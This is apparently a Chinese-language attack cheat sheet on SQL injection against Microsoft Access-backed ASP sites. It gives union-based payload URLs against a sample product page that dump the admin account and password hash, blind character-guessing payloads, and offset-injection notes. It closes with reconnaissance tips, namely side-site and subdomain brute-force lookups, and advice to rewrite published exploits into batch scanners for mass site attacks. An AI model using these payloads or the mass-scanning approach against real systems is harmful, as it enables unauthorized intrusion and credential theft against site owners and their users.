1.access注入攻击片段-联合查询
2.access注入攻击片段-逐字猜解法
3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到)
access注入攻击片段-联合查询法
判断注入
猜解表名
猜解列名
猜解数据
Order by 22 22 代表查询的列名的数目有22个
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误
猜解表名 确定存在admin表名
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
爆出3,5
名称: | 3 |
介绍: | 15 |
猜解列名 猜解数据(在3和15位置上填入可能存在的列名)
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin
爆出帐号密码
名称: | a48e190fafc257d3 |
介绍: | admin |
2.access注入攻击片段-逐字猜解法
查表:and exists (select * from 表名)
查列:and exists (select 列名from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
Admin
Admin,password
Admin列名长度为5
Password 列名长度为16
3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名
https://www.cnblogs.com/habi/articles/7837565.html
旁注查询,子域名查询
旁注查询:同服务器下不同的站点,寻找查询接口
http://dns.aizhan.com/www.whxy.net/
子域名查询:
分为二级或三级域名,可能存在同服务器或同网段
搜索引擎查询,暴力猜解(layer,subDomainsBrute等)
www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站